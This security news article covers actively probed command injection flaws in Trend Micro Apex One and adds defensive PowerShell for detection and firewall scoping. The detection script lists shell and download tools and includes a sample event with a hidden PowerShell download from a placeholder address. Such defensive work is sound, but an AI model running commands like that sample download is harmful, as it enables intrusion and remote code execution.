
Active Exploits Target Trend Micro Apex One Flaws (CVE-2025-54948, CVE-2025-54987)

Summary

– Trend Micro warns of active probing for unauthenticated command injection vulnerabilities (CVE-2025-54948, CVE-2025-54987) in its Apex One on-premise platform.
– A patch is expected by mid-August 2025; in the meantime Trend Micro provides a temporary “fix tool”, which works by disabling the Remote Install Agent function.
– The vulnerabilities allow remote code execution because user-supplied strings are not properly validated in the Apex One console; which builds are affected depends on the console version and the CPU architecture.
– At least one exploitation attempt has been observed. Network access to the Management Console is a prerequisite for exploitation, but valid credentials are not.
– Organizations are urged to apply the temporary fix, restrict console access, and install the upcoming patch to restore full functionality.

Security teams are on high alert as attackers actively probe critical vulnerabilities in Trend Micro’s Apex One endpoint protection platform. Two unpatched flaws tracked as CVE-2025-54948 and CVE-2025-54987 could allow remote code execution on affected systems, putting organizations at risk until a permanent fix arrives in mid-August 2025.

Trend Micro has confirmed these command injection vulnerabilities exist in the on-premise version of Apex One, specifically impacting Management Console versions 20216 and below. While a full patch is still weeks away, the company has released an interim mitigation tool that disables the vulnerable Remote Install Agent feature. Administrators should apply this workaround immediately, though it temporarily restricts agent deployment capabilities.

How the Exploits Work

Both vulnerabilities stem from insufficient validation of user-supplied input in the Apex One Management Console, a web application that by default listens on TCP ports 8080 (HTTP) and 4343 (HTTPS). An attacker who can reach those ports can craft requests that execute arbitrary commands on the console server with the privileges of the IUSR account, the built-in low-privilege identity that IIS uses for anonymous requests. Reaching full system compromise from IUSR would take further steps, but the console server is a high-value target because it administers every Apex One agent in the estate, so even a low-privilege foothold there is serious.
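The injection described above leaves a concrete trace on the console server: a command interpreter started under the IIS context, as IUSR. The following is an added example, not code from Trend Micro or from the article, of a hunt for that pattern. It assumes Sysmon with process-creation logging (Event ID 1) on the console server, that the console runs under the IIS worker process w3wp.exe, and that injected commands run as IUSR as the article states; the sample events are constructed for the offline demonstration.

```powershell
# Added example (not from Trend Micro or the article): hunt for command
# interpreters spawned under the Apex One console's IIS context.
# Assumptions: Sysmon Event ID 1 is available on the console server; the console
# runs under w3wp.exe; injected commands run as NT AUTHORITY\IUSR (per the article).

$ShellImages = @('cmd.exe', 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe',
                 'mshta.exe', 'certutil.exe', 'bitsadmin.exe', 'curl.exe', 'rundll32.exe')

function Test-SuspiciousConsoleChild {
    # $Proc is any object carrying Sysmon Event ID 1 field names
    # (Image, ParentImage, User, CommandLine).
    param([Parameter(Mandatory)] $Proc)

    $image  = [IO.Path]::GetFileName([string]$Proc.Image).ToLowerInvariant()
    $parent = [IO.Path]::GetFileName([string]$Proc.ParentImage).ToLowerInvariant()

    # Signal 1: spawned straight from the IIS worker process.
    $fromIis = $parent -eq 'w3wp.exe'
    # Signal 2: running as IUSR. An intermediate CGI executable can sit between
    # w3wp.exe and the shell, so the user check is the more robust of the two.
    $asIusr  = $Proc.User -like '*\IUSR'

    return ($ShellImages -contains $image) -and ($fromIis -or $asIusr)
}

function ConvertFrom-SysmonEvent {
    # Flatten an EventLogRecord into an object keyed by its EventData names.
    param([Parameter(Mandatory, ValueFromPipeline)] $Record)
    process {
        $xml = [xml]$Record.ToXml()
        $h = [ordered]@{}
        foreach ($d in $xml.Event.EventData.Data) { $h[$d.Name] = $d.'#text' }
        [pscustomobject]$h
    }
}

function Get-ConsoleChildAlerts {
    # Live hunt over the last $Days days of Sysmon process-creation events.
    param([int]$Days = 7)
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Sysmon/Operational'
        Id        = 1
        StartTime = (Get-Date).AddDays(-$Days)
    } -ErrorAction SilentlyContinue |
        ConvertFrom-SysmonEvent |
        Where-Object { Test-SuspiciousConsoleChild $_ }
}

# Constructed sample events (Sysmon Event ID 1 field names) for an offline run.
# 203.0.113.7 is a documentation-range address, not a real indicator.
$SampleEvents = @(
    [pscustomobject]@{ UtcTime = '2025-08-05 09:12:01'; Image = 'C:\Windows\System32\cmd.exe'
                       ParentImage = 'C:\Windows\System32\inetsrv\w3wp.exe'
                       User = 'NT AUTHORITY\IUSR'; CommandLine = 'cmd.exe /c whoami' }
    [pscustomobject]@{ UtcTime = '2025-08-05 09:12:05'; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       ParentImage = 'C:\Program Files (x86)\Trend Micro\Apex One\PCCSRV\Web\CGI\cgiRun.exe'
                       User = 'NT AUTHORITY\IUSR'; CommandLine = 'powershell.exe -nop -w hidden -c "iwr http://203.0.113.7/a"' }
    [pscustomobject]@{ UtcTime = '2025-08-05 09:30:44'; Image = 'C:\Windows\System32\cmd.exe'
                       ParentImage = 'C:\Windows\explorer.exe'
                       User = 'CORP\jdoe'; CommandLine = 'cmd.exe' }          # interactive admin, benign
    [pscustomobject]@{ UtcTime = '2025-08-05 09:31:02'; Image = 'C:\Windows\System32\inetsrv\w3wp.exe'
                       ParentImage = 'C:\Windows\System32\svchost.exe'
                       User = 'IIS APPPOOL\DefaultAppPool'; CommandLine = 'w3wp.exe' }   # worker start, benign
)

$SampleEvents | Where-Object { Test-SuspiciousConsoleChild $_ } |
    Format-Table UtcTime, User, ParentImage, CommandLine -AutoSize
```

The path under `Apex One\PCCSRV\Web\CGI` in the second sample is an illustrative placeholder for an intermediate CGI parent, not a file named in the advisory; it is there to show why the IUSR check catches what the w3wp.exe parent check alone would miss. On a real server, call `Get-ConsoleChildAlerts` and review every hit by hand, since legitimate scheduled tasks on the console host rarely run as IUSR.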

Cloud-based versions of Apex One and Trend Vision One were also affected, but Trend Micro deployed server-side fixes for these SaaS offerings on July 31, 2025. The on-premise variants remain exposed until the upcoming patch.

Active Exploitation Observed

Security researcher Jacky Hsieh of CoreCloud Tech discovered the flaws and reported them through the Zero Day Initiative (ZDI) on August 1, 2025. Trend Micro has since detected at least one attempted exploit in the wild, though details remain scarce.

Exploitation requires network access to the management console but not valid credentials, so organizations whose console ports are reachable from the internet face the greatest risk. Trend Micro advises restricting console access through network controls until the permanent update arrives.

Recommended Actions

Apply the temporary fix tool immediately; the final update will automatically re-enable the Remote Install Agent function the interim fix disables, so the loss of that capability is temporary. Until the patch is available, restrict network access to the console ports to the networks that need them, and install the patch as soon as it is released. Given the active probing by malicious actors, security teams should treat these vulnerabilities as a high-priority threat.
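The network restriction recommended above can be applied on the console server itself with Windows Defender Firewall. The following is an added example, not Trend Micro's fix tool or documentation, that scopes the console listener ports the article names (8080/tcp and 4343/tcp) to a set of allowed networks, disables broader allow rules that would undo the scoping, and verifies from outside. The allowed ranges and the host name apexone-console.corp.example are placeholders, not values from the advisory.

```powershell
# Added example (not Trend Micro's fix tool or documentation): remove outside
# exposure of the on-premise Apex One console by scoping 8080/tcp and 4343/tcp
# with Windows Defender Firewall on the console server. Run elevated on that server.
# Placeholders: $AllowedNetworks and apexone-console.corp.example are assumptions.
#
# Caveat: in a default Apex One deployment the agents typically report to the
# server on this same web listener, so the allowed list must include every network
# that hosts agents, not only the administrators' subnet, or endpoints lose contact
# with the server. Confirm the agent-server port in the console before applying.

$ConsolePorts    = @(8080, 4343)
$AllowedNetworks = @('10.0.0.0/8', '192.168.0.0/16')   # placeholder internal ranges
$RulePrefix      = 'ApexOne Console'

function Get-BroadConsoleAllowRules {
    # Enabled inbound Allow rules, other than ours, that admit a console port.
    # Any matching Allow rule lets traffic in, so these would undo the scoping.
    Get-NetFirewallRule -Direction Inbound -Action Allow -Enabled True |
        Where-Object { $_.DisplayName -notlike "$RulePrefix*" } |
        ForEach-Object {
            $rule  = $_
            $pf    = $rule | Get-NetFirewallPortFilter
            $ports = @($pf.LocalPort)
            $tcp   = $pf.Protocol -in @('TCP', 'Any')
            $hit   = ($ports -contains 'Any') -or
                     (@($ConsolePorts | Where-Object { $ports -contains "$_" }).Count -gt 0)
            # Port ranges such as '8000-9000' are not expanded here; review those by hand.
            if ($tcp -and $hit) { $rule }
        }
}

function Set-ApexOneConsoleScope {
    [CmdletBinding(SupportsShouldProcess)]
    param([string[]]$AllowedRemote = $AllowedNetworks)

    # A scoped Allow rule only matters if the default inbound action is Block
    # (the Windows default, restated here in case it was changed).
    if ($PSCmdlet.ShouldProcess('all firewall profiles', 'set default inbound action to Block')) {
        Set-NetFirewallProfile -Profile Domain, Private, Public -DefaultInboundAction Block
    }

    # Re-create our rule so the function is idempotent.
    $target = "$($ConsolePorts -join ',')/tcp from $($AllowedRemote -join ', ')"
    if ($PSCmdlet.ShouldProcess($target, 'allow inbound')) {
        Get-NetFirewallRule -DisplayName "$RulePrefix*" -ErrorAction SilentlyContinue | Remove-NetFirewallRule
        New-NetFirewallRule -DisplayName "$RulePrefix - allowed networks" -Direction Inbound `
            -Protocol TCP -LocalPort $ConsolePorts -RemoteAddress $AllowedRemote `
            -Action Allow -Profile Any | Out-Null
    }

    # Broader Allow rules (for example ones created at install time) would still
    # expose the ports; disable rather than delete them so they can be reviewed.
    foreach ($rule in Get-BroadConsoleAllowRules) {
        if ($PSCmdlet.ShouldProcess($rule.DisplayName, 'disable broad inbound allow rule')) {
            Disable-NetFirewallRule -Name $rule.Name
        }
    }
}

function Test-ConsoleReachable {
    # Run from a host OUTSIDE the allowed networks (a cloud VM, a guest Wi-Fi
    # laptop); after scoping, Reachable should be False for both ports.
    param([string]$ConsoleHost = 'apexone-console.corp.example')
    foreach ($p in $ConsolePorts) {
        [pscustomobject]@{
            Host      = $ConsoleHost
            Port      = $p
            Reachable = Test-NetConnection -ComputerName $ConsoleHost -Port $p `
                            -InformationLevel Quiet -WarningAction SilentlyContinue
        }
    }
}

# On the console server, preview first, then apply:
#   Set-ApexOneConsoleScope -WhatIf
#   Set-ApexOneConsoleScope
# From a machine outside the allowed networks:
#   Test-ConsoleReachable | Format-Table -AutoSize
```

A host firewall rule is one layer only: if a perimeter NAT or load-balancer rule publishes the console to the internet, remove that as well, and if Windows Firewall on the server is managed by Group Policy, make the same change in the policy or it will be overwritten at the next refresh. The reachability test from an outside vantage point is what confirms the exposure is actually gone.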


(Source: HelpNet Security)
